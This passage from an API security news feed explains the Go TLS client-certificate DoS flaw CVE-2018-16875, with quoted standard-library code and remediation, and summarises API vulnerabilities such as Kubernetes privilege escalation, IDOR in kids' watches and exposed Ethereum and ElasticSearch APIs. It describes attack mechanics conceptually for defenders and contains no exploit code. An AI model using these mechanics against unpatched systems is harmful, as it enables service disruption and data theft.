<p>Here, the server processes the client certificate it received and calls the function <code>x509/tls/handshake_server.go:processCertsFromClient()</code>. If the client certificate has to be verified, the server creates a <a href="https://golang.org/pkg/crypto/x509/#VerifyOptions"><code>VerifyOptions</code></a> structure that contains:</p>
<ul>
<li>The root CA pool, a list of trusted CAs configured to verify clients certificate (cotrolled by the server)</li>
<li>The intermediate CA pool, a list of <em>received</em> intermediate CAs (controlled by the client)</li>
<li>The signed client certificate (controlled by the client)</li>
<li>Other fields (optional)</li>
</ul>
<pre class="line-numbers" data-start="679"><code class="language-go">if c.config.ClientAuth &gt;= VerifyClientCertIfGiven &amp;&amp; len(certs) &gt; 0 {
        opts := x509.VerifyOptions{
                Roots:         c.config.ClientCAs,
                CurrentTime:   c.config.time(),
                Intermediates: x509.NewCertPool(),
                KeyUsages:     []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
        }

        for _, cert := range certs[1:] {
                opts.Intermediates.AddCert(cert)
        }

        chains, err := certs[0].Verify(opts)
        if err != nil {
                c.sendAlert(alertBadCertificate)
                return nil, errors.New("tls: failed to verify client's certificate: " + err.Error())
        }

        c.verifiedChains = chains
}</code></pre>
<p>To understand what went wrong, you need to understand how certificate pools are organised to allow certificate verification in an efficient manner. A certificate pool, simply put, is a list of certificates, that are accessible through three different ways depending on the need. The following diagram shows an example of this: Certificates grouped in a pool are accessible through an indexed array  (named &#8220;Certs&#8221;) and are hashed by <code>CN</code>, <code>IssuerName</code>, <code>SubjectKeyId</code>.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5327 size-full" src="https://apisecurity.io/wp-content/uploads/2018/12/CVE-2018-16875-Certificate-Pools.png" alt="Certificate pools in Go / x509/cert_pool.go:DertPool" width="960" height="720" /></p>
<h4>Verification</h4>
<p>The server calls the function <code>Verify()</code> with <code>VerifyOptions</code> on the client certificate (the first certificate in the <code>chain:certs[0]</code>).</p>
<p>Then, <code>Verify()</code> takes the client certificate to be verified against the provided chain. However, first the verification chain must be built and checked using the <code>buildChains()</code> function:</p>
<pre class="line-numbers" data-start="764"><code class="language-go">var candidateChains [][]*Certificate
if opts.Roots.contains(c) {
        candidateChains = append(candidateChains, []*Certificate{c})
} else {
        if candidateChains, err = c.buildChains(make(map[int][][]*Certificate), []*Certificate{c}, &amp;opts); err != nil {
                return nil, err
        }
}</code></pre>
<p>The <code>buildChains()</code> function in turn calls some CPU-expensive functions sequentially and recursively calls itself on each element of the chain it finds.</p>
<p>The  <code>buildChains()</code> function relied on a helper function <code>findVerifiedParents()</code> that  identifies the parent certificate, using map access of the certificate pool by <code>IssuerName</code> or <code>AuthorityKeyId</code>, and returns the index of the certificate candidate that then gets verified against the client controlled pool.</p>
<p>In normal conditions, <code>IssuerName</code> and <code>AuthorityKeyId</code> are populated and expected to be <strong>unique</strong>, which returns <strong>only one</strong> certificate to verify:</p>
<pre class="line-numbers"><code class="language-go">func (s *CertPool) findVerifiedParents(cert *Certificate) (parents []int, errCert *Certificate, err error) {
	if s == nil {
		return
	}
	var candidates []int

	if len(cert.AuthorityKeyId) &gt; 0 {
		candidates = s.bySubjectKeyId[string(cert.AuthorityKeyId)]
	}
	if len(candidates) == 0 {
		candidates = s.byName[string(cert.RawIssuer)]
	}

	for _, c := range candidates {
		if err = cert.CheckSignatureFrom(s.certs[c]); err == nil {
			parents = append(parents, c)
		} else {
			errCert = s.certs[c]
		}
	}

	return
}</code></pre>
<p>The <code>buildChains()</code> function calls the following on the whole certificate chain the client sent to the TLS server:</p>
<ul>
<li><code>findVerifiedParents(client_certificate)</code> on the root CA pool (server-side) to locate the signing authority (if it&#8217;s the root CA) of the verified certificate <em>and </em>check the signatures of all candidates for the certificate <code>AuthorityKeyId</code> (if not nil) or the raw issuer value (if nil)</li>
<li><code>findVerifiedParents(client_certificate)</code> on the intermediate CA pool (client-provided) to locate the signing authority (if it&#8217;s the root CA) of the verified certificate <em>and </em>check the signatures of all candidates for the certificate <code>AuthorityKeyId</code> (if not nil) or the raw issuer value (if nil),</li>
<li>Get the signing intermediate parent</li>
<li>Call <code>buildChains()</code> with the newly-found intermediate parent, which repeats the whole set of signature checks previous described</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5328 size-full" src="https://apisecurity.io/wp-content/uploads/2018/12/CVE-2018-16875-BuildChains.png" alt="How x509/verify.go:buildChains() function works in Golang" width="1185" height="837" /></p>
<h4>The DoS attack</h4>
<p>The main CPU DoS is triggered by <code>buildChains()</code> and <code>findVerifiedParent()</code> functions in the unexpected conditions where all intermediate CA certificates share the same name and have a nil <code>AuthKeyId</code> value. The <code>findVerifiedParent()</code> function returns all certificates matching that name, which is the entire pool, and then checks signatures against all the certificates. Once that is done, the <code>buildchains()</code> function is again called for the found parent recursively until it reaches the root CA, each time verifying against the entire intermediate CA pool ,and hence consuming all available CPU for only <em>one</em> TLS connection!</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5329 size-full" src="https://apisecurity.io/wp-content/uploads/2018/12/CVE-2018-16875-Figure-1-DoS.png" alt="CPU denial of service (DoS) attack on mutual SSL/TLS authentication" width="951" height="823" /></p>
<h4>Impact</h4>
<p>An attacker can construct a certificate chain that makes the client certificate verification consume all the CPU resources and thus making the host less responsive. This has been implemented with only <em>one</em> connection. In accordance with Go scheduler rules, only two CPU cores were affected and used at 100%, creating a new connection and forcing the scheduler to allocate more resources to process the signature check, which in turn can lead to an unresponsive service or host.</p>
<h4>Remediation</h4>
<p>The Go language community has fixed the issue by implementing <a href="https://go-review.googlesource.com/c/go/+/154105/">the following changes</a>:</p>
<ul>
<li>Moving signature checking <em>out</em> of the <code>findVerifiedParent()</code> certificate pool lookup</li>
<li>Limit the number of signature checks to the maximum of 100 intermediate CAs (which is an unrealistic trust chain)</li>
</ul>
<p>To get the fixes, <a href="https://golang.org/dl/">upgrade</a> immediately to Go v1.10.6 or later, or v1.11.3 or later.</p>
<p>The post <a href="https://apisecurity.io/mutual-tls-authentication-vulnerability-in-go-cve-2018-16875/">Understanding Golang TLS mutual authentication DoS &#8211; CVE-2018-16875</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 10: Unprotected Docker and Ethereum APIs, McAfee 2019 forecast</title>
		<link>https://apisecurity.io/issue-10-unprotected-docker-ethereum-apis-mcaffee-2019-forecast/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 13 Dec 2018 00:00:05 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5262</guid>

					<description><![CDATA[<p>Vulnerabilities Another API vulnerability has been found in Google+ (we reported on the previous one in our first newsletter back in October). Turns out that an update that Google rolled out in November put user data at risk because permissions were not properly enforced. The API could provide access to user profile data even if the data was [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-10-unprotected-docker-ethereum-apis-mcaffee-2019-forecast/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-10-unprotected-docker-ethereum-apis-mcaffee-2019-forecast/">Issue 10: Unprotected Docker and Ethereum APIs, McAfee 2019 forecast</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h4>Vulnerabilities</h4>
<p>Another API vulnerability has been found in <strong>Google+</strong> (we reported on the previous one <a href="https://apisecurity.io/issue-1-apistrat-cors-samsung-google-facebook-gitlab-apple/">in our first newsletter back in October</a>). Turns out that an update that Google rolled out in November put user data at risk because permissions were not properly enforced. The API could provide access to user profile data even if the data was not public. Google did a good job <a href="https://www.blog.google/technology/safety-security/expediting-changes-google-plus/">disclosing it</a>: they found it themselves, fixed it in 6 days, and they report there&#8217;s no evidence of any exploit.</p>
<h4>Unprotected APIs</h4>
<p><strong>Ethereum </strong>wallets and mining equipment <a href="https://www.zdnet.com/article/hackers-ramp-up-attacks-on-mining-rigs-before-ethereum-price-crashes-into-the-gutter/">are getting hacked</a> through JSON-RPC API. The API was designed to be used by applications running locally on the same server, so it has no protection by default. Unfortunately, some systems using the API have all interfaces open, thus exposing the API without any security on port <code>8545</code>. The API gives you full access, and there have already been reports of millions of dollars worth of the cryptocurrency stolen through the API.</p>
<p><strong>Docker</strong> APIs are switched off by default, but they are required for remote administration and some 3rd-party tools. If the APIs are opened without applying proper security ,they leave your infrastructure vulnerable. Pierluigi Paganini has <a href="https://securityaffairs.co/wordpress/78548/hacking/api-abuse-docker-containers.html">found more than 1000 exposed hosts</a>, with plenty of them already compromised and running malicious workloads such as cryptomining.</p>
<h4>Research</h4>
<p>Researches from Texas A&amp;M University used WARDroid framework to analyze the backend APIs of <strong>10,000 popular Google Play apps</strong>. The researchers then used the APIs directly, bypassing the apps, and found 926 of the apps to be vulnerable to various API attacks. See <a href="http://faculty.cs.tamu.edu/guofei/paper/WARDroid_SP18.pdf">the original research paper</a> and <a href="https://threatpost.com/wardroid-uncovers-mobile-threats-to-millions-of-users-worldwide/132525/">its summary in ThreatPost</a>.</p>
<h4>Analysts</h4>
<p><strong>McAfee Labs</strong> have published their <a href="https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-2019-threats-predictions/">2019 Threats Predictions Report</a>. On API security, they have included API access to cloud-stored data in their predicitions: &#8220;<em>Cloud-native attacks targeting weak APIs or ungoverned API endpoints to gain access to the data in SaaS as well as in PaaS and serverless workloads</em>&#8220;.</p>
<h4>Best Practices</h4>
<p><strong>Aaron Lint</strong> from Arxan talks about <a href="https://www.programmableweb.com/news/api-your-app-trojan-horse/analysis/2018/11/29">how web application firewall (WAF) cannot detect API hacks</a> when the attackers mask their behavior by hiding attack calls (like out of bounds parameters) in normal API traffic. This tactic will probably also fool other tools based on artificial intelligence / machine learning / anomaly detection.</p>
<p>The post <a href="https://apisecurity.io/issue-10-unprotected-docker-ethereum-apis-mcaffee-2019-forecast/">Issue 10: Unprotected Docker and Ethereum APIs, McAfee 2019 forecast</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 9: Patch your Kubernetes and security cameras, check out the Node.js security guide</title>
		<link>https://apisecurity.io/issue-9-patch-kubernetes-and-nuuo-security-cameras-node-js-security-guide-http3/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 06 Dec 2018 00:00:11 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5202</guid>

					<description><![CDATA[<p>Vulnerabilities If you are using Kubernetes, you should install a patch for it as soon as possible. There is a huge privilege escalation vulnerability that got fixed this week. The flaw allows attackers to contact Kubernetes API server using a non-privileged account and then get high-privilege operations forwarded to backend services. Even worse, the calls are not showing [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-9-patch-kubernetes-and-nuuo-security-cameras-node-js-security-guide-http3/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-9-patch-kubernetes-and-nuuo-security-cameras-node-js-security-guide-http3/">Issue 9: Patch your Kubernetes and security cameras, check out the Node.js security guide</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h4>Vulnerabilities</h4>
<p>If you are using <strong>Kubernetes,</strong> you should <strong>install a patch for it as soon as possible</strong>. There is a huge <a href="https://www.theregister.co.uk/2018/12/03/kubernetes_flaw_cve_2018_1002105/">privilege escalation vulnerability that got fixed this week</a>. The flaw allows attackers to contact Kubernetes API server using a non-privileged account and then get high-privilege operations forwarded to backend services. Even worse, the calls are not showing up in server audit logs or server logs, making the attack hard to detect.</p>
<p>Abraham Ingersoll from Gravitational <a href="https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/">published details here</a>:</p>
<ol>
<li>Attacker contacts Kubernetes API server and requests a connection to a backend server over HTTP/2 websockets.</li>
<li>API server forwards the request to the backend server.</li>
<li>The request is made in a way that it automatically fails.</li>
<li>An error is returned to the attacker, but API server leaves open a connection to the backend that is authenticated with high-privilege TLS certificate of the API server itself,</li>
<li>The attacker uses the open, authenticated connection to send requests to invoke high-privilege operations. The backend server has no reason to suspect anything out of ordinary but completes the request.</li>
</ol>
<p><img loading="lazy" decoding="async" class="aligncenter" src="https://gravitational.com/blog/images/2018/kubernetes-websocket-upgrade-security-vulnerability-diagram.png" alt="" width="813" height="529" /></p>
<p>One of the popular <strong>security camera systems,</strong> NUUO NVRmini2 Network Video Recorder, had a serious API vulnerability <a href="https://www.digitaldefense.com/blog/zero-day-alerts/nuuo-firmware-disclosure/">reported by Digital Defense.</a> Because string parameters were not checked for their length or sanitized, attackers could craft an overly long GET request, cause stack overflow and execute arbitrary code as <code>root</code>. This way, the attacker can intercept and even replace the video stream from the security cameras.</p>
<p>If you&#8217;re using <strong>ElasticSearch</strong>, you may expose more APIs than you are aware of. Lots of companies have lately had ElasticSearch breaches and their customer records exposed:</p>
<ul>
<li><a href="https://www.zdnet.com/article/sky-brasil-exposes-data-of-32-million-subscribers/">SKY Brasil</a> (32 mln customer records)</li>
<li><a href="https://www.securityinfowatch.com/news/12438109/personal-data-of-more-than-2m-patients-compromised-in-atrium-health-data-breach">Atrium Health</a> (2.65 mln)</li>
<li><a href="https://techcrunch.com/2018/11/27/urban-massage-data-exposed-customers-creepy-clients/">Urban Massage</a> (300K)</li>
<li><a href="https://www.zdnet.com/article/brazils-largest-professional-association-suffers-massive-data-leak/">Brazil&#8217;s Federation of Industries of the State of São Paulo &#8211; FIESP</a> (millions)</li>
<li><a href="https://www.bankinfosecurity.com/blogs/data-leads-site-disappears-after-data-exposure-alert-p-2687">Data&amp;Leads</a> (83 mln)</li>
</ul>
<p>The breaches happen because, by default, ElasticSearch is wide open and not secured at all. So, to avoid the breaches:</p>
<ol>
<li>Avoid having your ElasticSearch accessible from the internet at all if you can.</li>
<li><a href="https://www.elastic.co/guide/en/elastic-stack-overview/current/get-started-enable-security.html">Enable (or install for older versions) the X-Pack security module</a> and set secure passwords for all default accounts.</li>
</ol>
<h4>Best Practices</h4>
<p>Are you implementing your APIs in <strong>Node.js</strong>? If so, check out this brilliant list of <a href="https://medium.com/@nodepractices/were-under-attack-23-node-js-security-best-practices-e33c146cb87d">23 security best practices</a>.</p>
<p><strong>Kristopher Sandoval</strong> from NordicAPIs goes through the <a href="https://nordicapis.com/5-ways-to-hack-an-api-and-how-to-defend/">possible ways how APIs get hacked</a> and how these could be remediated. His list of attacks includes, for example:</p>
<ul>
<li>Reverse engineering</li>
<li>Spoofing</li>
<li>Man-in-the-middle</li>
<li>Session replays</li>
<li>Social engineering</li>
</ul>
<p><strong>Tsahi Levent-Levi</strong> has posted in TechTarget his <a href="https://searchunifiedcommunications.techtarget.com/answer/How-do-APIs-work-and-how-can-you-ensure-they-are-secure">4 steps to securing your APIs</a>. The checklist is, in a nutshell:</p>
<ol>
<li>Authorization</li>
<li>Audit trail</li>
<li>Data at rest and data in motion</li>
<li>Rate limiting</li>
</ol>
<h4>Standards</h4>
<p>The free <a href="https://daniel.haxx.se/blog/2018/11/26/http3-explained/">&#8220;HTTP/3 explained&#8221; ebook from Daniel Stenberg</a> contains some good information on the upcoming <strong>HTTP/3 protocol</strong>.  In this protocol, the encrypted traffic will be based on the QUIC protocol.</p>
<h4>Surveys</h4>
<p>According to <a href="https://www.techrepublic.com/article/excessive-api-growth-puts-enterprise-security-at-risk/">a recent survey by Ping Identity</a>, security and IT professionals seem to have doubts whether the security teams of their companies are up to speed with API security:</p>
<ul>
<li>45% lack confidence in their security team to detect malicious API access</li>
<li>51% are not confident their security team is aware of all APIs existing in their organization.</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-9-patch-kubernetes-and-nuuo-security-cameras-node-js-security-guide-http3/">Issue 9: Patch your Kubernetes and security cameras, check out the Node.js security guide</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 8: USPS API broken, APIdays, ETSI downgrades TLS</title>
		<link>https://apisecurity.io/issue-8-usps-api-broken-apidays-etsi-downgrades-tls/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 29 Nov 2018 00:00:05 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5182</guid>

					<description><![CDATA[<p>Vulnerabilities United States Postal Service (USPS) just fixed an API vulnerability. The vulnerability seems to have been a combination of: Developers not expecting outsiders to bypass the web page and use the API directly Insecure Direct Object Reference (IDOR), authenticating as one user and getting data of another user Leaky API where wildcards were not [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-8-usps-api-broken-apidays-etsi-downgrades-tls/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-8-usps-api-broken-apidays-etsi-downgrades-tls/">Issue 8: USPS API broken, APIdays, ETSI downgrades TLS</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h4>Vulnerabilities</h4>
<p>United States Postal Service (<strong>USPS</strong>) <a href="https://krebsonsecurity.com/2018/11/usps-site-exposed-data-on-60-million-users/">just fixed an API vulnerability</a>. The vulnerability seems to have been a combination of:</p>
<ul>
<li>Developers not expecting outsiders to bypass the web page and use the API directly</li>
<li>Insecure Direct Object Reference (IDOR), authenticating as one user and getting data of another user</li>
<li>Leaky API where wildcards were not blocked in parameters</li>
</ul>
<p>In Europe, the <strong>city of York,</strong> UK, <a href="https://www.yorkmix.com/news/major-security-breach-as-hackers-obtain-users-personal-info-from-york-council-phone-app/">had to shut down their mobile app, One Planet, due to an API vulnerability</a>. The vulnerability allowed researchers to download data of all of the app&#8217;s 5,994 users, such as names, home addresses, postcodes, emails, telephone numbers, and encrypted passwords.</p>
<h4>Conferences</h4>
<p><strong>APIdays </strong>is the world&#8217;s leading API conference, and the Paris event is scheduled on December 11-12, 2018. <a href="https://www.apidays.co/paris">The agenda</a> includes quite a few security-related talks as well. If you are around and don&#8217;t have a ticket yet, <a href="https://42crunch.com/free-apidays-paris-2018-pass">42Crunch is giving away free passes to the conference</a>.</p>
<h4>Best Practices</h4>
<p>The &#8220;Dynamic Web and Mobile Application Development&#8221; guide newly published by <strong>DZone</strong> includes a section on <a href="https://dzone.com/articles/security-best-practices-for-managing-api-access-to"><strong>API Token Management Security</strong></a> by Isabelle Mauny that takes a look at the best practices from the API perspective concerning, for example, obtaining tokens and keys, token management, OAuth, and JWT.</p>
<h4>Standards</h4>
<p><a href="https://mobilepki.org/jws-jcs/home">The first online tool</a> around <a href="https://tools.ietf.org/html/draft-erdtman-jose-cleartext-jws-01"><strong>Clear Text JWS</strong></a>, an initiative aiming at implementing enveloped signature for JSON messages, has been released.</p>
<p>The European Telecommunications Standards Institute (ETSI) <a href="https://www.etsi.org/deliver/etsi_ts/103500_103599/10352303/01.01.01_60/ts_10352303v010101p.pdf">proposed their variation of TLS 1.3 called <strong>eTLS</strong></a> and it looks quite bad: it removes the full forward secrecy, and thus potentially enables eavesdropping by telcos and  companies, as well as man-in-the-middle attacks.</p>
<p>The post <a href="https://apisecurity.io/issue-8-usps-api-broken-apidays-etsi-downgrades-tls/">Issue 8: USPS API broken, APIdays, ETSI downgrades TLS</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 7: OAuth attacks, vulnerabilities in drones and kids&#8217; watches</title>
		<link>https://apisecurity.io/issue-7-oauth-attacks-vulnerabilities-drones-kids-watches/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 21 Nov 2018 19:08:25 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5152</guid>

					<description><![CDATA[<p>Vulnerabilities This is as ugly as it gets: MiSafes kids&#8217; watches allow accessing very specific information on a child, such as photo, gender, age, height, location, and even provide a remote microphone access. API calls are not secured by TLS and are open to Insecure Direct Object Reference (IDOR), meaning that as long as you have [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-7-oauth-attacks-vulnerabilities-drones-kids-watches/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-7-oauth-attacks-vulnerabilities-drones-kids-watches/">Issue 7: OAuth attacks, vulnerabilities in drones and kids&#8217; watches</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h4>Vulnerabilities</h4>
<p>This is as ugly as it gets: <strong>MiSafes kids&#8217; watches </strong>allow accessing very specific information on a child, such as photo, gender, age, height, location, and even provide a remote microphone access. <a href="https://www.pentestpartners.com/security-blog/tracking-and-snooping-on-a-million-kids/">API calls are not secured by TLS and are open to Insecure Direct Object Reference</a> (IDOR), meaning that as long as you have authenticated to the system and know the ids (which happen to be sequential) to use, you can get access to other users&#8217; data because there are no authorization checks on objects. You can simply create an account and then iterate the <code>family_id</code> parameter  and access all the watches out there. The Chinese manufacturer is not commenting on or fixing the vulnerability. It also looks like there are other cheap kids&#8217; smartwatches using the same platform, and thus susceptible to the same vulnerability.</p>
<p><strong>DJI drones</strong> <a href="https://www.bleepingcomputer.com/news/security/dji-drone-flight-logs-photos-and-videos-exposed-to-unauthorized-access/">used to expose user data including flight logs, pictures, and videos</a>. The problem was that the same cookie (that did not use <code>HttpOnly</code> flag) and the OAuth access token were used across all API clients, both web, mobile. This meant that once you got a user token from one DJI property, you could get access everywhere. Researchers created a Cross-Site Scripting (XSS) attack by planting a rogue link in DJI forums &#8211; any user clicking the link provided them the cookie to access all that user&#8217;s data.</p>
<h4>Technology</h4>
<p><strong>OAuth 2.0</strong> is one of the cornerstones of API security. Prabath Siriwardena has compiled <a href="https://wso2.com/library/article/2018/11/oauth-threat-landscape/">a thorough catalog of possible OAuth 2.0 attacks,</a> with details, examples, and ways to prevent the attacks. The catalog includes, for example, phishing, Identity Provider mixup, Cross Site Request Forgery (CSRF), token reuse, token leakage, open redirection, and code interception.</p>
<p>While we are at potential OAuth 2.0 vulnerabilities, the upcoming <strong>OAuth 2.0 Security Best Current Practice</strong> guide from IETF OAuth working group states that clients should not use the implicit grant because it is vulnerable to access token leakage. See <a href="https://medium.com/@torsten_lodderstedt/why-you-should-stop-using-the-oauth-implicit-grant-2436ced1c926">the post</a> for detailed discussion.</p>
<h4>Conferences</h4>
<p><a href="https://blog.qualys.com/news/2018/11/16/qsc18-api-security-enabling-innovation-without-enabling-attacks-and-data-breaches">Qualys has posted a summary</a> of the recent talk by <strong>Gartner&#8217;s Mark O&#8217;Neill</strong> on &#8220;API Security: Enabling Innovation Without Enabling Attacks and Data Breaches&#8221; at Qualys Security Conference.</p>
<p>The post <a href="https://apisecurity.io/issue-7-oauth-attacks-vulnerabilities-drones-kids-watches/">Issue 7: OAuth attacks, vulnerabilities in drones and kids&#8217; watches</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 6: Steam API leaks keys, and why WAF does not help DevSecOps</title>
		<link>https://apisecurity.io/issue-6-steam-api-leaks-keys-waf-not-help-devsecops/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 15 Nov 2018 00:00:28 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5136</guid>

					<description><![CDATA[<p>Vulnerabilities An API vulnerability was found in the license generation API of Valve&#8217;s Steam gaming service and marketplace. Anyone who had registered at their partner portal for developers could call their /partnercdkeys/assignkeys/ with unexpected parameter values (for example, a random string as a partner name and 0 as the request count) and get thousands of keys in the [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-6-steam-api-leaks-keys-waf-not-help-devsecops/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-6-steam-api-leaks-keys-waf-not-help-devsecops/">Issue 6: Steam API leaks keys, and why WAF does not help DevSecOps</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h4>Vulnerabilities</h4>
<p><a href="https://www.theregister.co.uk/2018/11/09/valve_steam_key_vulnerability/">An API vulnerability was found in the license generation API</a> of Valve&#8217;s <strong>Steam</strong> gaming service and marketplace. Anyone who had registered at their partner portal for developers could call their /partnercdkeys/assignkeys/ with unexpected parameter values (for example, a random string as a partner name and 0 as the request count) and get thousands of keys in the response that they could use or resell.</p>
<h4>Technology</h4>
<p><a href="https://apisecurity.io/issue-4-remini-and-twitter-counter-widget-hacked-tls-explained-atms-and-swift-get-apis/">Our previous newsletter</a> already covered the &#8220;<strong>Illustrated TLS</strong>&#8221; site by Michael Driscoll that provides step-by-step illustrations on how TLS 1.2 works. Now, he has launched <a href="https://tls13.ulfheim.net/">a version of the site for TLS 1.3</a>! The new version brings quite a few changes in the protocol, so go check it out.</p>
<h4>Analysts</h4>
<p><a href="https://www.computerweekly.com/news/252451900/DevSecOps-not-limited-to-coding-says-analyst">A DevSecOps piece</a> by <strong>KuppingerCole</strong>&#8216;s Alexei Balaganski offers the following key takeaways on API security:</p>
<ul>
<li>The days of relying only on a web application firewall (WAF) are over, you need solutions specifically for API Security</li>
<li>Microservices are containers + APIs</li>
<li>Your security strategy must cover containers, APIs, microservices, and data</li>
</ul>
<h4>Opinions</h4>
<p><a href="https://www.darkreading.com/application-security/expect-api-breaches-to-accelerate/d/d-id/1332504">A Dark Reading article on API security</a> by <strong>Ericka Chick</strong> puts APIs as an attack vector center stage:</p>
<ul>
<li>API breaches trend is accelerating</li>
<li>Underprotected APIs [almost] got included in the OWASP Top 10 in 2017</li>
<li>Estimated 2/3 of organizations are exposing APIs, yet 3/4 pay <em>less</em> attention to API security than to web security</li>
</ul>
<h4>Surveys</h4>
<p>An example of why surveys need to be taken with a pinch of salt: According to <a href="https://www.businesswire.com/news/home/20181107005059/en/">a recent survey by Ping Identity</a>, if a company suffers a data breach, <strong>78% of customers will stop interacting with it online</strong> and <strong>36% will never use it at all</strong>. Can you imagine the actual business impact on sales and revenue to any large company if this was the real consumer behavior? Yet, if you look at the revenue and share valuation numbers of any of this year&#8217;s high profile breach cases, such as T-Mobile, Target, or British Airways, you can see that there has been no noticeable impact on these figures, and definitely not on the scale the survey results imply.</p>
<p>The post <a href="https://apisecurity.io/issue-6-steam-api-leaks-keys-waf-not-help-devsecops/">Issue 6: Steam API leaks keys, and why WAF does not help DevSecOps</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 5: Bad TLS client authentication, how not to use cURL, State of Software Security</title>
		<link>https://apisecurity.io/issue-5-bad-tls-client-authentication-not-use-curl-state-software-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 07 Nov 2018 12:16:10 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5123</guid>

					<description><![CDATA[<p>Vulnerabilities Do not use TLS client authentication, unless you are already on TLS 1.3. With TLS 1.2 and earlier, when you use client authentication, the client certificate is transmitted in the clear. This contains enough information to uniquely identify the user. Hundreds of thousands of projects use cURL and purposefully disable the verification of TLS host [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-5-bad-tls-client-authentication-not-use-curl-state-software-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-5-bad-tls-client-authentication-not-use-curl-state-software-security/">Issue 5: Bad TLS client authentication, how not to use cURL, State of Software Security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h4>Vulnerabilities</h4>
<p>Do not use <strong>TLS <em>client authentication</em></strong>,<em> </em>unless you are already on TLS 1.3. With TLS 1.2 and earlier, when you use client authentication, <a href="https://blog.funkthat.com/2018/10/tls-client-authentication-leaks-user.html">the client certificate is transmitted in the clear</a>. This contains enough information to uniquely identify the user.</p>
<p>Hundreds of thousands of projects use <strong>cURL</strong> and purposefully disable the verification of TLS host and SSL certificate authority (CA). The aim is to avoid error messages and failures if the local storage is missing up-to-date CA lists, but lacking these verifications makes you extremely vulnerable to the man-in-the-middle attacks. <a href="https://www.zdnet.com/google-amp/article/many-cms-plugins-are-disabling-tls-certificate-validation-and-thats-very-bad/">Scott Arciszewski reported the issue</a> and created the <a href="https://github.com/paragonie/certainty">Certainty</a> PHP library to auto-refresh the CA lists.</p>
<p>A security researcher has reported a <strong>Google Home Hub</strong> vulnerability this week which Google is denying. The researcher is <a href="https://9to5google.com/2018/10/30/google-home-insecure/">claiming that Google is effectively betting on security by obscurity</a>. Google Home Hub is built on top of the Chromecast platform that has an undocumented API for enrolling new devices. The API requires that the device is on the same WiFi network as the Google Home Hub but has no authentication beyond that.</p>
<h4>Conference talks</h4>
<p>Isabelle Mauny, CTO and co-founder of 42Crunch, <a href="https://www.slideshare.net/42crunch/better-api-security-with-automation">has posted slides</a> from her &#8220;<strong>Better API Security with Automation</strong>&#8221; session at the Nordic APIs conference.</p>
<h4>Industry news</h4>
<p>The latest <a href="https://www.veracode.com/sites/default/files/pdf/resources/reports/state-of-software-security-2018-veracode-report.pdf">State of Software Security report</a> by Veracode is out. It is a 60-page report with lots of insights and details. A couple of API-related highlights include:<br />
1. Information Leakage is the number one vulnerability category, 66.9% of apps had that!<br />
